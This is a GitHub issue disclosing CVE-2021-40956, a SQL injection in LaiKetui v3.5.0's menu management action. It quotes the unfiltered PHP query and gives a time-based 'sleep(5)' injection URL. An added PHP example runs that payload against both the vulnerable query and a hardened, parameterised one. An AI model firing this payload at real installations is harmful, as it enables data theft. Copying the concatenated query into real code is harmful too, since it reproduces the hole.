CVE-2021-40956: SQL injection exists in the LaiKetui menu management function · Issue #13 · bettershop/LaikeTui
LaiKetui v3.5.0 has a SQL injection vulnerability in the back-end menu management function, through which sensitive data can be obtained.
The link where the SQL injection exists is http://127.0.0.1/LaiKe/app/LKT/index.php?module=menu&action=modify&id=1
Locate the vulnerable file: /app/LKT/webapp/modules/menu/actions/modifyAction.class.php
Because the parameter id is not filtered, it leads to a SQL injection vulnerability:
    public function getDefaultView() {
        $db = DBAction::getInstance();
        $request = $this->getContext()->getRequest();
        // Receive the request parameters
        $id = $request->getParameter("id");
        $_SESSION['url'] = $_SERVER['HTTP_REFERER'];
        // Look up the menu by id; $id is interpolated into the query unfiltered
        $sql = "select * from lkt_core_menu where id = '$id'";
        $r_1 = $db->select($sql);
        // ... rest of the method is not shown on the page
    }
Use Burp Suite to request the URL http://ceshi.io/laike/app/LKT/index.php?module=menu&action=modify&id=1' and sleep(5)--+
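The query pattern from modifyAction.class.php next to a hardened form, as an added example that is not LaiKetui's code. It assumes PHP 8 with pdo_sqlite; PDO stands in for the project's DBAction class, the function names are hypothetical, and the table rows are constructed.

```php
<?php
// Added example, not LaiKetui code. Assumes PHP 8 with pdo_sqlite; PDO stands in
// for the project's DBAction class and the table rows are constructed.
declare(strict_types=1);

$pdo = new PDO('sqlite::memory:');
$pdo->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
$pdo->exec("CREATE TABLE lkt_core_menu (id INTEGER PRIMARY KEY, title TEXT)");
$pdo->exec("INSERT INTO lkt_core_menu (id, title) VALUES (1, 'Dashboard'), (2, 'Orders')");

// Pattern from the issue: the request value is spliced into the SQL text.
function findMenuConcatenated(PDO $pdo, string $id): array
{
    $sql = "select * from lkt_core_menu where id = '$id'";
    return $pdo->query($sql)->fetchAll(PDO::FETCH_ASSOC);
}

// Hardened: accept only a positive integer, then bind it as a typed parameter.
function findMenuHardened(PDO $pdo, string $id): array
{
    $menuId = filter_var($id, FILTER_VALIDATE_INT, ['options' => ['min_range' => 1]]);
    if ($menuId === false) {
        throw new InvalidArgumentException('menu id must be a positive integer');
    }
    $stmt = $pdo->prepare('select * from lkt_core_menu where id = :id');
    $stmt->bindValue(':id', $menuId, PDO::PARAM_INT);
    $stmt->execute();
    return $stmt->fetchAll(PDO::FETCH_ASSOC);
}

// A normal id, then the id value quoted in the issue after URL decoding ("+" is a space).
$inputs = ['1', "1' and sleep(5)-- "];
foreach ($inputs as $input) {
    foreach (['findMenuConcatenated', 'findMenuHardened'] as $fn) {
        try {
            $rows = $fn($pdo, $input);
            $result = 'rows=' . count($rows);
        } catch (PDOException $e) {
            $result = 'input reached the SQL parser: ' . $e->getMessage();
        } catch (InvalidArgumentException $e) {
            $result = 'rejected before any SQL ran: ' . $e->getMessage();
        }
        printf("%-21s %-24s %s\n", $fn, json_encode($input), $result);
    }
}
```

SQLite has no sleep() function, so the concatenated query fails inside the database engine, which shows that the text after the quote was parsed as SQL; the hardened function rejects the same input before a query is built.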